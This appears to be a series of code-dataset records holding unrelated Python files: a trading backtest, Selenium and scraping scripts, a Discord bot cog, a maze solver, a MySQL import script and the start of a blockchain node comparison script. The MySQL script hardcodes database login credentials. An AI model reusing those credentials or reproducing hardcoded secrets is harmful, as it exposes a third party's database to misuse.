PCA1\r\nfixc=0.0#8\r\nprop=0.00#1\r\n\r\n#Leo, elimino columnas que no necesito y completo las mensuales\r\ndf = pd.read_csv('InputData.csv',index_col='DATE')\r\n#df['ret1d'] = np.log(df.SP_LAST) - np.log(df.SP_LAST.shift(1))\r\ndf.drop(df.index[0:19], inplace=True)\r\ndf.drop(['ICJ','MVOLNU'], 1, inplace=True)\r\nmonthdf=df[['DG_Ord','DG_Ship','ShortInt','CAPE','CPI']].copy()\r\nmonthdf= monthdf.fillna(method='pad')\r\ndf.drop(['DG_Ord','DG_Ship','ShortInt','CAPE','CPI'], 1, inplace=True)\r\ndf= pd.concat([df, monthdf], axis=1)\r\n\r\n#elijo cantidad de meses, defino el \"Label\" a pronosticar y elimino las últimas filas\r\nModel=3 #Meses a pronosticar\r\nshift=Model*21\r\ndf['retModel'] = np.log(df.SP_LAST.shift(-shift)) - np.log(df.SP_LAST)\r\ndf['label'] = np.sign(df.retModel)\r\ndf.drop(df.index[-shift:], inplace=True)\r\n\r\n#Ajusto variables para que tengan mejor sentido económico\r\ndf['DP'] = np.log(df['SPYDPS']) - np.log(df['SPY'])\r\n\r\nXpca=df[['DP','PE','BM','CAPE']].copy()\r\nproj=PCA1.Principal(Xpca)\r\ndf['PCAPrice']= proj*(-1)\r\n\r\n#fechas=df[[]].copy() #Arreglar esto en algun momento asi no hay que calcular en Excel\r\n#df['SIM']=PCA1.Simm(fechas)\r\n\r\newma=df.USGG10YR.ewm(span=252,adjust=True).mean()\r\ndf['BY']= df['USGG10YR']/ewma\r\ndf['DEF'] = df['BAA_Yield'] - df['AAA_Yield']\r\ndf['TERM'] = df['USGG10YR'] - df['USGG3M']\r\ndf['VRP'] = df['VIX'] #- df['VESTIM']\r\ndf['NOS'] = np.log(df['DG_Ord']) - np.log(df['DG_Ship'])\r\ndf['PCR'] = np.log(df['SPY']) - np.log(df['GSCI'])\r\nwind=210\r\nwind2=50\r\ndf['MA'] = df['SP_LAST'].rolling(window=wind,min_periods=None).mean()\r\ndf['MA2'] = df['SP_LAST'].rolling(window=wind2,min_periods=None).mean()\r\ndf['OIL'] = df['CL1'] - df['CL4'].shift(63)\r\ndf['SI'] = df['ShortInt']/df['NYAVOL'].rolling(window=21,min_periods=None).mean()\r\ndf.drop(df.index[:wind-1], inplace=True)\r\n#df[['NYAVOL','MAVol']].plot()\r\n\r\n#falta calcular Cay, VarianceStimator y PCA_Tech.\r\n#Revisar calculo de SI. Combina diario y mensual\r\n\r\n#df = df[['PCAPrice','BY', 'DEF', 'TERM', 'SIM','VRP','NOS', \r\n# 'CPI', 'PCR', 'MA', 'OIL','SI','label']]\r\n\r\n#col=['PCAPrice','BY', 'DEF', 'TERM', 'SIM','BDI','VRP','NOS','CPI', 'PCR', 'MA', 'OIL','SI']\r\n#col=['PCAPrice','BY', 'DEF', 'TERM', 'NOS','CPI', 'PCR', 'MA','SI','label']\r\n\r\ncol=['MA','CPI','label']\r\n\r\ndf2=df.copy()\r\n\r\ndf=df2[col].copy()\r\ndf= df.fillna(-99999)\r\ndf.to_csv('out.csv', sep=',')\r\n\r\nX = np.array(df.drop(['label'], 1))\r\ny = np.array(df['label'])\r\nX_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.25)\r\n\r\nclf = svm.SVC(kernel=\"rbf\")\r\nclf.fit(X_train, y_train)\r\nconfidence = clf.score(X_test, y_test)\r\nprediction=clf.predict(X_test)\r\npred=pd.DataFrame(prediction,columns=['Pred'])\r\nprint(confidence)\r\n\r\nMaxLong=2\r\nMaxShort=1\r\n\r\nevol = df2[['SP_LAST']][-len(pred):]\r\npred.set_index(evol.index.values,inplace=True)\r\nevol = pd.concat([evol, pred], axis=1)\r\n#evol['B&H']= np.log(evol.SP_LAST) - np.log(evol.SP_LAST.shift(1))\r\n\r\nMoney0=evol['SP_LAST'][0]*(1+prop)+fixc\r\nevol['S&P']= evol.SP_LAST/Money0\r\nevol['Money']=0.0\r\nevol['Cant']=0.0\r\n\r\nMoney0=evol['SP_LAST'][0]*(1+prop)+fixc\r\n\r\nn=1 #cantidad que compro en cada decisión\r\nstep=21\r\n#paso inicial\r\nif evol['Pred'][0]==1:\r\n evol['Cant'][0]=1\r\n evol['Money'][0]=Money0-n*evol['SP_LAST'][0]*(1+prop)-fixc\r\nif evol['Pred'][0]==-1:\r\n evol['Cant'][0]=-1\r\n evol['Money'][0]=Money0+n*evol['SP_LAST'][0]*(1-prop)-fixc\r\n \r\nfor i in range(1,len(pred)): \r\n if evol['Pred'][i]==1 and evol['Cant'][i-1]<=MaxLong-1 and i%step == 0 :\r\n evol['Cant'][i]=evol['Cant'][i-1]+1\r\n evol['Money'][i]=evol['Money'][i-1]-n*evol['SP_LAST'][i]*(1+prop)-fixc\r\n elif evol['Pred'][i]==-1 and evol['Cant'][i-1]>=MaxShort-1 and i%step == 0 :\r\n evol['Cant'][i]=evol['Cant'][i-1]-1\r\n evol['Money'][i]=evol['Money'][i-1]+n*evol['SP_LAST'][i]*(1-prop)-fixc \r\n else:\r\n evol['Cant'][i]=evol['Cant'][i-1]\r\n evol['Money'][i]=evol['Money'][i-1]\r\n \r\nevol['Port']=evol['Money']+evol['Cant']*evol['SP_LAST']\r\nevol['SVM']=evol.Port/Money0\r\n#print(evol) \r\n\r\nevol[['S&P','SVM']].plot()\r\n\r\n \r\n#with pd.option_context('display.max_rows', None, 'display.max_columns', 3):\r\n# print(df.label)\r\n\r\n\r\n\r\n\r\n\"\"\"\r\nexample_measures = np.array([[4,2,1,1,1,2,3,2,1]])\r\nexample_measures = example_measures.reshape(len(example_measures), -1)\r\nprediction = clf.predict(example_measures)\r\nprint(prediction)\r\n\"\"\"\r\n","sub_path":"svm_2017_09_29.py","file_name":"svm_2017_09_29.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"542798969","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time;\n#C_TC3: We are using the Google Chrome browser to launch our app and obtain a Validating if the number of response of the API is matching the dynamically populated records.\ndriver= webdriver.Chrome(\"/home/antony/Desktop/Irish Rail Microservice Testing/chromedriver\")\ndriver.get(\"http://localhost/ASE-Rail/index.php\")\ndriver.maximize_window();\ntime.sleep(3) \ndriver.save_screenshot(\"./Screenshot/C_TC3: Step-1.png\")\nmy_list = []\ntry:\n\tfor x in range(100):\n\t\th=str(x+2)\n\t\tstr1=\"/html/body/div/center/table/tbody/tr[\"+h+\"]/td[1]\"\n\t\te = driver.find_element_by_xpath(str1)\n\t\tmy_list.append(e.text)\n\nexcept:\n\tprint(\"An exception occurred:Out of range\")\n\nprint(\"responses from API: \",my_list,\"\\n\")\nprint(\"Total number of responses from API= \",len(my_list))\nif (str(len(my_list)) in driver.page_source):\n\tprint(\"Response Matched\")\n\nelse:\n\tprint(\"Response not Matched\")\n\n\n","sub_path":"testing/Irish Rail Microservice Testing/C_TC3/C_TC3.py","file_name":"C_TC3.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"266150060","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# *\n# * Created by PyCharm.\n# * User: qixu\n# * Date:2018/11/13\n# * Time: 13:53\n# *\nimport time, requests,random\nfrom pyquery import PyQuery as pq\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\na = 'src=\"//club2.autoimg.cn/album/g28/M07/07/00/userphotos/2018/11/05/22/500_ChcCR1vgTqGABCXLAAHapIlRdNA092.jpg\"'\nprint(a.split('_')[1][:-5])\nexit()\ndef getUrls(page):\n url = \"https://club.autohome.com.cn/JingXuan/104/\" + str(page)\n res = requests.get(url)\n if res.status_code == 200:\n text = pq(res.text)\n text = text('.content p a').items()\n for item in text:\n urltemp = 'https:' + item.attr.href\n with open('urls.txt', 'a+') as f:\n f.write(urltemp + '\\n')\n\n'''\n获取图片地址,存入imgs.txt中\n'''\ndef getImgs(url):\n broswer = webdriver.Chrome()\n broswer.get(url)\n # 获取图片\n time.sleep(5)\n title = broswer.find_element_by_css_selector('.maxtitle').text\n i = broswer.find_elements_by_css_selector('.tz-figure .x-loaded img')\n for item in i:\n with open('imgs.txt', 'a+') as f:\n f.write(item.get_attribute('src') + '\\n')\n res = requests.get(item.get_attribute('src'))\n if res.status_code == 200:\n with open('./imgs/' + str(i) + '.jpg', 'wb') as f1:\n f1.write(res.content)\n time.sleep(random.randint(4,8))\n time.sleep(random.randint(6,15))\n broswer.close()\n\n\ndef imgs():\n i = 0\n with open('imgs.txt', 'r') as f:\n for item in f:\n i = i + 1\n if not item.startswith('http'):\n continue\n res = requests.get(item)\n if res.status_code == 200:\n with open('./imgs/' + str(i) + '.jpg', 'wb') as f1:\n f1.write(res.content)\n time.sleep(15)\n\nif __name__ == '__main__':\n # for i in range(1,28):\n # getUrls(i)\n # time.sleep(3)\n num = 1\n with open('urls.txt', 'r') as f:\n for item in f:\n print('正在获取第{0}个帖子'.format(num))\n getImgs(item)\n time.sleep(random.randint(7,10))\n num = num +1\n # imgs()\n\n","sub_path":"实例/汽车之家.py","file_name":"汽车之家.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"433059220","text":"from DecisionTree import DecisionTree, DisplayTree, Testing\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nglobal root\r\n\r\nIrreleventClasses=[]\r\nDataset = input(\"Enter Name of Dataset File: \") \r\nTargetClass = input(\"Enter Name of Target Class: \")\r\nn = int(input(\"Enter number of Irrelevent Classes: \")) \r\nfor i in range(0, n): \r\n element = input('Enter Irrelevent Class: ') \r\n IrreleventClasses.append(element) \r\n \r\n\r\nfulldata = pd.read_csv(Dataset)\r\nTrainingData,Test=train_test_split(fulldata, test_size=0.2, random_state=42)\r\n\r\n \r\nroot=DecisionTree(TrainingData, TargetClass, IrreleventClasses)\r\nprint(root.label)\r\n\r\nDisplayTree(root)\r\n\r\nTesting(Test,root)\r\n","sub_path":"DecisionTree-main/DecisionTreeMain.py","file_name":"DecisionTreeMain.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"115717933","text":"'''\nConstants & Hyperparameters\n'''\n#add an experiment ID with the timestamp in order to catalog each experiment\n#id=1\n\nimage_size = 28\nnum_labels = 10\nnum_channels = 1 # grayscale\nbatch_size = 16\n\n#the following included to bridge RNN and LeNet Code with diff variable names\ninput_size = image_size**2\nnum_classes = num_labels\nstate_size = 2000\nnum_batches = 2000\n#where 1 = target, 2 = distractor, 3 = blank\ntemporal_order = [1,3]\n#the number of timesteps that the input data will be shown\nnum_steps = len(temporal_order)\n#the total number of timesteps for which an image will be shown\nnum_timesteps = 1\nimage_size = 28\npatch_size = 5\n\n\nimage_size = 28\n\n\nkernelSize = 5\ndepth1Size = 6\ndepth2Size = 16\nnum_channels = 1\n\npadding=\"SAME\"\nconvStride = 1\npoolStride = 2\npoolFilterSize = 2\n\nFC1HiddenUnit = 360\nFC2HiddenUnit = 784\n\nlearningRate=1e-4\n\n","sub_path":"Constants_HyperPara.py","file_name":"Constants_HyperPara.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"93050061","text":"import discord.ext.commands as commands\nimport libs.utilities as utilities\nimport typing as t\nimport pathlib\nimport discord\nimport model\n\nclass Voice(commands.Cog):\n \"\"\"Houses the voice client for Bakerbot. Audio commands can be found here.\"\"\"\n def __init__(self, bot: model.Bakerbot) -> None:\n self.bot = bot\n\n def cog_unload(self) -> None:\n \"\"\"Ensures a clean disconnect from any voice clients on unload.\"\"\"\n for client in self.bot.voice_clients:\n coro = self.cog_unload_disconnect(client)\n self.bot.loop.create_task(coro)\n\n async def cog_unload_disconnect(self, client: discord.VoiceClient) -> None:\n \"\"\"Asynchronous unloading task for disconnecting voice clients.\"\"\"\n await client.disconnect()\n\n async def connect(self, channel: discord.VoiceChannel) -> None:\n \"\"\"Either connects or moves the bot to a specific voice channel.\"\"\"\n client = channel.guild.voice_client\n offline = client is None or not client.is_connected()\n function = channel.connect() if offline else client.move_to(channel)\n await function\n\n async def ensure_client(self, remote: t.Optional[discord.VoiceClient]) -> bool:\n \"\"\"Returns the state of the voice client after attempting a connection.\"\"\"\n if remote is None or remote.channel is None:\n return False\n\n await self.connect(remote.channel)\n return True\n\n @commands.group(invoke_without_subcommand=True)\n async def vc(self, ctx: commands.Context) -> None:\n \"\"\"The parent command for voice client management.\"\"\"\n if ctx.invoked_subcommand is None:\n if ctx.subcommand_passed is None:\n # There is no subcommand: inform the user about voice clients.\n summary = \"\"\"Hi! Welcome to Bakerbot's voice client command group.\n This cog houses commands related to audio.\n See `$help voice` for a full list of available subcommands.\"\"\"\n\n embed = utilities.Embeds.standard()\n embed.description = summary\n embed.set_footer(text=\"Dunno what to put here.\", icon_url=utilities.Icons.info)\n await ctx.reply(embed=embed)\n else:\n # The subcommand was not valid: throw a fit.\n command = f\"${ctx.command.name} {ctx.subcommand_passed}\"\n summary = f\"`{command}` is not a valid command.\"\n footer = \"Try $help voice for a full list of available subcommands.\"\n embed = utilities.Embeds.status(False, summary)\n embed.set_footer(text=footer, icon_url=utilities.Icons.cross)\n await ctx.reply(embed=embed)\n\n @vc.command()\n async def upload(self, ctx: commands.Context) -> None:\n \"\"\"Uploads a file to Bakerbot's music repository.\"\"\"\n embed = utilities.Embeds.status(True, None)\n saved = 0\n\n async with ctx.typing():\n for attachment in ctx.message.attachments:\n filepath = f\"music/{attachment.filename}\"\n if pathlib.Path(filepath).is_file():\n await attachment.save(filepath)\n saved += 1\n\n embed.description = f\"Uploaded {saved} files!\"\n await ctx.reply(embed=embed)\n\n @vc.command()\n async def play(self, ctx: commands.Context, track: t.Optional[str]) -> None:\n \"\"\"Plays audio tracks from the music folder.\"\"\"\n if track is None:\n paginator = utilities.Paginator()\n paginator.placeholder = \"Tracks\"\n\n for track in pathlib.Path(\"music\").iterdir():\n label = f\"{track.name[0:22]}...\" if len(track.name) > 25 else track.name\n option = discord.SelectOption(label=label, value=track.name, description=str(track))\n paginator.add(option)\n\n await ctx.reply(\"Please select a track from the dropdown menu.\", view=paginator)\n track = await paginator.wait()\n if track is None:\n return\n\n filepath = pathlib.Path(f\"music/{track}\")\n if not filepath.is_file():\n fail = utilities.Embeds.status(False, f\"{track} is not a valid track.\")\n return await ctx.reply(embed=fail)\n\n if not (await self.ensure_client(ctx.author.voice)):\n fail = utilities.Embeds.status(False, \"Unable to join a channel.\")\n return await ctx.reply(embed=fail)\n\n track = await discord.FFmpegOpusAudio.from_probe(filepath)\n embed = utilities.Embeds.standard()\n embed.set_footer(text=\"Interaction complete.\", icon_url=utilities.Icons.info)\n embed.description = f\"Now playing `{filepath}`.\"\n\n if ctx.voice_client.is_playing() or ctx.voice_client.is_paused():\n ctx.voice_client.stop()\n\n ctx.voice_client.play(track)\n await ctx.reply(embed=embed)\n\n @vc.command()\n async def join(self, ctx: commands.Context, *, channel: t.Optional[discord.VoiceChannel]) -> None:\n \"\"\"Joins the voice channel that the invoker is in, or `channel` if specified.\"\"\"\n channel = channel or getattr(ctx.author.voice, \"channel\", None)\n\n if channel is None:\n response = \"No available channels exist (either none specified or you aren't in one).\"\n fail = utilities.Embeds.status(False, response)\n return await ctx.reply(embed=fail)\n\n await self.connect(channel)\n\n @vc.command()\n async def leave(self, ctx: commands.Context) -> None:\n \"\"\"Disconnects the bot from any guild voice channels.\"\"\"\n vc = ctx.guild.voice_client\n if vc is not None and vc.is_connected():\n await vc.disconnect()\n\ndef setup(bot: model.Bakerbot) -> None:\n cog = Voice(bot)\n bot.add_cog(cog)\n","sub_path":"cogs/voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"312372150","text":"from Component import * \n\nclass Timezone(Component):\n\tDescription=''\n\t_attributes=[]\n\t_attributes_value={}\n\t_items=[]\t\t\n\t_methods=[]\n\tX=0\n\tY=0\n\t\n\n\tdef __init__(self):\n\t\tself.Description='This Component Shows Timezone'\n\t\tself._attributes=[('X','int'),('Y','int')]\t\t\n\t\tself._attributes_value={'X':0,'Y':0}\t\t\n\t\tself._methods=[('getPage','Change current page')]\n\n\n\tdef getPage(self):\n\t\treturn \"Page is changed\"\n\n","sub_path":"ceng445_softwareDevelopmentWithScriptingLanguages/phase4/mysite/Timezone.py","file_name":"Timezone.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"117526054","text":"# added this comment\n\nimport sys\n\nclass Point:\n \"\"\" Represent a two-dimensional point\n x - horizontal position\n y - vertical position\n \"\"\"\n\n def __init__(self, x, y):\n \"\"\" Initialize a new point\n \"\"\"\n self.x, self.y = int(x), int(y)\n\n def __str__(self):\n \"\"\" Return a string representation of self\n \"\"\"\n return \"({}, {})\".format(self.x, self.y)\n\n def __repr__(self):\n \"\"\"\n Return a string that would evaluate to a Point equivalent to self\n \"\"\"\n return \"Point({}, {})\".format(self.x, self.y)\n\n def step(self, other, step):\n \"\"\" Apply the step size to a given point and return the new neighbour\n \"\"\"\n return Point(self.x + (other.x * step), self.y + (other.y * step))\n\n\nclass Queue:\n def __init__(self):\n self.items = []\n def isEmpty(self):\n return self.items == []\n def enqueue(self, item):\n self.items.insert(0,item)\n def dequeue(self):\n return self.items.pop()\n def size(self):\n return len(self.items)\n\nif __name__ == '__main__':\n\n # You do NOT need to include any error checking.\n # I found this particular check personally helpful, when I forgot to provide a filename.\n if len(sys.argv) != 2:\n print(\"Usage: python3 Alice.py \")\n sys.exit()\n\n # Here is how you open a file whose name is given as the first argument\n f = open(sys.argv[1])\n\n d = {}\n step = 1\n\n for line in f:\n line = line.strip()\n content = line.split(\",\")\n initial_point = content[0].split(\".\")\n d[Point(int(initial_point[0]), int(initial_point[1])).__str__()] = content[1:]\n d[Point(int(initial_point[0]), int(initial_point[1])).__str__()].append(Point(int(initial_point[0]), int(initial_point[1])))\n\n start = None\n for i in d:\n\n # determine the starting\n if d[i][0] == 'START':\n start = i\n\n if (d[i][0] != 'GOAL'):\n # split all the neighbour vectors into a list\n d[i][1] = d[i][1].split(\"|\")\n else:\n goal = i\n\n # convert all neighbour vectors into Point objects\n for j in range(len(d[i][1])):\n vector = d[i][1][j].split(\".\")\n d[i][1][j] = Point(int(vector[0]), int(vector[1]))\n\n d[i][-2] = int(d[i][-2])\n d[i][-4] = None\n\n\n maze_size = int(len(d) ** 0.5)\n\n print(d)\n print(maze_size)\n\n adj_list = {}\n temp = step\n\n while (temp != maze_size):\n inner = {}\n\n for i in d:\n lst = []\n for j in range(len(d[i][1])):\n\n lst.append(d[i][-1].step(d[i][1][j], temp))\n\n inner[i] = lst\n adj_list[temp] = inner\n\n temp += 1\n print(adj_list)\n\n # initialize queue with start\n step = 1\n failed = 0\n q = Queue()\n q.enqueue(start)\n\n # begin the BFS loop\n while q.isEmpty() != True:\n u = q.dequeue()\n\n if (d[u.__str__()][0] == 'RED'):\n step += 1\n elif (d[u.__str__()][0] == 'YELLOW'):\n step -= 1\n\n if (step == maze_size or step == 0 or failed == 1):\n failed = 1\n break\n\n for i in adj_list[step][u.__str__()]:\n try:\n if d[i.__str__()][3] == 'white':\n\n # change the colour\n d[i.__str__()][3] = 'grey'\n\n # update the parent\n d[i.__str__()][2] = u\n\n # increase the distance\n d[i.__str__()][4] = d[d[i.__str__()][2].__str__()][4] + 1\n\n q.enqueue(i)\n except(KeyError):\n failed = 1\n break\n d[u.__str__()][3] = 'black'\n\n if (failed == 1):\n print(\"No sol\")\n else:\n # print path here\n last = []\n dist = d[goal][4]\n last.append(d[goal][-1])\n while d[goal][2] is not None:\n last.append(d[goal][2])\n goal = str(d[goal][2])\n print(last)\n print(dist)\n\n\n\n","sub_path":"Alice.py","file_name":"Alice.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"488884260","text":"'''\nCreated on 2015-03-27\n\n@author: Moskalyk\n'''\nfrom __future__ import print_function\nimport MySQLdb\nimport csv\n#TODO: Output Graphical representation of data \n\n#Reading in CSV File\ntry:\n raw_data = open('cleaned_data.csv', 'r').read().split('\\r')\nexcept:\n print('File not found')\n\n################## DATABASE ######################\n#Connecting to the SQL Database\ntry:\n db = MySQLdb.connect(host=\"sql3.freemysqlhosting.net\", # hostname\n user=\"sql372028\", # username\n passwd=\"lZ2%fG4!\", # password\n db=\"sql372028\") # database\n cur = db.cursor()\nexcept:\n print('Could not connect to database') \n \n\n# # cur.execute(\"DROP TABLE IF EXISTS TestTable\")\n\ncur.execute(\"DROP TABLE IF EXISTS RESPONSE\")\ncur.execute(\"DROP TABLE IF EXISTS LEADERITE\")\n\n\n# Create table as per requirement\nsql_create_table_1 = \"\"\"CREATE TABLE LEADERITE(\n ID INTEGER NOT NULL,\n FIRST_NAME VARCHAR(20),\n LAST_NAME VARCHAR(20),\n SITE_NAME VARCHAR(50),\n PRIMARY KEY(ID)\n )\"\"\"\n# \nsql_create_table_2 = \"\"\"CREATE TABLE RESPONSE(\n RESPONSE_ID INTEGER AUTO_INCREMENT NOT NULL,\n LEADERITE_ID INTEGER NOT NULL,\n WELL_PREPARED INTEGER,\n ENJOYED_CASE INTEGER,\n CASE_TAUGHT VARCHAR(50),\n PACE_OF_CLASS INTEGER,\n KEY_LEARNING_POINTS INTEGER,\n STIMULATES_DISCUSSION INTEGER,\n Q_A INTEGER,\n TIME_EFFECTIVENESS INTEGER,\n OPINIONS_OF_CLASS INTEGER,\n TEACHING_STRENGTHS VARCHAR(500),\n CASE_STRENGTHS VARCHAR(500),\n NEW_IDEAS VARCHAR(500),\n TEACHING_IMPROVEMENTS VARCHAR(500),\n PRIMARY KEY(RESPONSE_ID),\n FOREIGN KEY (LEADERITE_ID) REFERENCES LEADERITE(ID)\n )\"\"\"\n \n#\ncur.execute(sql_create_table_1)\ncur.execute(sql_create_table_2)\n\n#Defining the insert function\ndef insertIntoLEADERTable(entry):\n LEADERITE_ID = int(entry)\n cur.execute(\"\"\"INSERT INTO LEADERITE (id) VALUES (%s)\"\"\", (LEADERITE_ID))\n \ndef insertIntoRESPONSETable(entry):\n LEADERITE_ID = int (entry[0][0])\n WELL_PREPARED = int(entry[0][2])\n ENJOYED_CASE = int(entry[1][2])\n CASE_TAUGHT = entry[2][2]\n PACE_OF_CLASS = int(entry[3][2])\n KEY_LEARNING_POINTS = int(entry[4][2])\n STIMULATES_DISCUSSION= int(entry[5][2]) \n Q_A = entry[6][2]\n TIME_EFFECTIVENESS = int(entry[7][2])\n OPINIONS_OF_CLASS = entry[8][2]\n TEACHING_STRENGTHS = entry[9][2]\n CASE_STRENGTHS = entry[10][2]\n NEW_IDEAS = entry[11][2]\n TEACHING_IMPROVEMENTS = entry[12][2]\n \n cur.execute(\"\"\"INSERT INTO RESPONSE ( LEADERITE_ID,\n WELL_PREPARED,\n ENJOYED_CASE,\n CASE_TAUGHT,\n PACE_OF_CLASS,\n KEY_LEARNING_POINTS,\n STIMULATES_DISCUSSION,\n Q_A,\n TIME_EFFECTIVENESS,\n OPINIONS_OF_CLASS,\n TEACHING_STRENGTHS,\n CASE_STRENGTHS,\n NEW_IDEAS,\n TEACHING_IMPROVEMENTS) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\", (LEADERITE_ID,\n WELL_PREPARED,\n ENJOYED_CASE,\n CASE_TAUGHT,\n PACE_OF_CLASS,\n KEY_LEARNING_POINTS,\n STIMULATES_DISCUSSION,\n Q_A,\n TIME_EFFECTIVENESS,\n OPINIONS_OF_CLASS,\n TEACHING_STRENGTHS,\n CASE_STRENGTHS,\n NEW_IDEAS,\n TEACHING_IMPROVEMENTS))\n\n################## CLEANING DATA ######################\n \nfull_data = []\n\nfor row in raw_data:\n split_row = row.split(\",\")\n full_data.append(split_row)\n \n#Unique Leader Cleaning\nleader_ids = []\n\nfor row in full_data:\n if row[0] not in leader_ids and len(row[0]) < 5 and row[0] is not '':\n leader_ids.append(row[0])\n\n#sorting data\nleader_ids.sort()\nfull_data.sort()\n\n\n#Inserting Leader ids into LEADERITE Table\nfor entry in leader_ids:\n insertIntoLEADERTable(entry)\n\n\n#response Cleaning\nfor row in leader_ids:\n temp_responses = []\n for data_row in full_data:\n if row == data_row[0]:\n temp_responses.append(data_row)\n \n #Inserting Leader ids into Response Table\n insertIntoRESPONSETable(temp_responses)\n \nfull_full_data = []\nheader = ['ID',\n 'LEADERITE_ID',\n 'WELL_PREPARED',\n 'ENJOYED_CASE',\n 'CASE_TAUGHT',\n 'PACE_OF_CLASS',\n 'KEY_LEARNING_POINTS',\n 'STIMULATES_DISCUSSION',\n 'Q_A',\n 'TIME_EFFECTIVENESS',\n 'OPINIONS_OF_CLASS',\n 'TEACHING_STRENGTHS',\n 'CASE_STRENGTHS',\n 'NEW_IDEAS',\n 'TEACHING_IMPROVEMENTS']\n\nfull_full_data.append(header)\n\n#Reading from database to csv file\ncur.execute('SELECT * FROM RESPONSE')\n\ntry:\n numrows = int(cur.rowcount)\n for x in range(0,numrows):\n row = cur.fetchone()\n full_full_data.append(row)\nexcept:\n print('Error: Unable to fetch data successfully.')\n \n#writing to file\nwith open('test.csv', 'w') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerows(full_full_data)\n \n#Committing Database \ndb.commit() \ndb.close() \n\nprint(\"\\nProgram Complete!\");\n \n\n\n\n\n\n","sub_path":"ConnectToSQL.py","file_name":"ConnectToSQL.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"50721860","text":"#!/usr/bin/env python3\n\"\"\"\n Usage: script_name jobs url1 url2 [wdir [last_block [first_block]]]\n Example: script_name 4 http://127.0.0.1:8090 http://127.0.0.1:8091 ./ 5000000 0\n set jobs to 0 if you want use all processors\n if last_block == 0, it is read from url1 (as reference)\n\"\"\"\n\nimport sys\nimport json\nimport os\nimport shutil\nfrom jsonsocket import JSONSocket\nfrom jsonsocket import cloutd_call\nfrom concurrent.futures import ThreadPoolExecutor\nfrom concurrent.futures import ProcessPoolExecutor\nfrom concurrent.futures import Future\nfrom concurrent.futures import wait\nfrom pathlib import Path\n\n\nwdir = Path()\nerrors = 0\n\n\ndef main():\n if len(sys.argv) < 4 or len(sys.argv) > 7:\n print(\"Usage: script_name jobs url1 url2 [wdir [last_block [first_block]]]\")\n print(\" Example: script_name 4 http://127.0.0.1:8090 http://127.0.0.1:8091 ./ 5000000 0\")\n print( \" set jobs to 0 if you want use all processors\" )\n print(\" if last_block == 0, it is read from url1 (as reference)\")\n exit()\n \n global wdir\n global errors\n first_block = 0\n last_block = 0\n\n jobs = int(sys.argv[1])\n if jobs <= 0:\n import multiprocessing\n jobs = multiprocessing.cpu_count()\n \n url1 = sys.argv[2]\n url2 = sys.argv[3]\n \n if len(sys.argv) > 4:\n wdir = Path(sys.argv[4])\n \n if len(sys.argv) > 5:\n last_block = int(sys.argv[5])\n else:\n last_block = 0\n if len(sys.argv) == 7:\n first_block = int(sys.argv[6])\n else:\n first_block = 0\n \n last_block1 = get_last_block(url1)\n last_block2 = get_last_block(url2)\n \n if last_block1 != last_block2:\n exit(\"last block of {} ({}) is different then last block of {} ({})\".format(url1, last_block1, url2, last_block2))\n\n if last_block == 0:\n last_block = last_block1\n elif last_block != last_block1:\n print(\"WARNING: last block from cmdline {} is different then from {} ({})\".format(last_block, url1, last_block1))\n \n if last_block == 0:\n exit(\"last block cannot be 0!\")\n \n create_wdir()\n\n blocks = last_block - first_block + 1\n\n if jobs > blocks:\n jobs = blocks\n\n print(\"setup:\")\n print(\" jobs: {}\".format(jobs))\n print(\" url1: {}\".format(url1))\n print(\" url2: {}\".format(url2))\n print(\" wdir: {}\".format(wdir))\n print(\" block range: {}:{}\".format(first_block, last_block))\n\n if jobs > 1:\n blocks_per_job = blocks // jobs\n\n with ProcessPoolExecutor(max_workers=jobs) as executor:\n for i in range(jobs-1):\n executor.submit(compare_results, first_block, (first_block + blocks_per_job - 1), url1, url2)\n first_block = first_block + blocks_per_job\n executor.submit(compare_results, first_block, last_block, url1, url2)\n else:\n compare_results(first_block, last_block, url1, url2)\n \n exit( errors )\n\n\ndef create_wdir():\n global wdir\n \n if wdir.exists():\n if wdir.is_file():\n os.remove(wdir)\n \n if wdir.exists() == False:\n wdir.mkdir(parents=True)\n\n\ndef get_last_block(url, max_tries=10, timeout=0.1):\n request = bytes( json.dumps( {\n \"jsonrpc\": \"2.0\",\n \"id\": 0,\n \"method\": \"database_api.get_dynamic_global_properties\",\n \"params\": {}\n } ), \"utf-8\" ) + b\"\\r\\n\"\n \n status, response = cloutd_call(url, data=request, max_tries=max_tries, timeout=timeout)\n \n if status == False:\n return 0\n try:\n return response[\"result\"][\"head_block_number\"]\n except:\n return 0\n\n\ndef compare_results(f_block, l_block, url1, url2, max_tries=10, timeout=0.1):\n global wdir\n global errors\n \n print( \"Compare blocks [{} : {}]\".format(f_block, l_block) )\n\n for i in range(f_block, l_block+1):\n request = bytes( json.dumps( {\n \"jsonrpc\": \"2.0\",\n \"id\": i,\n 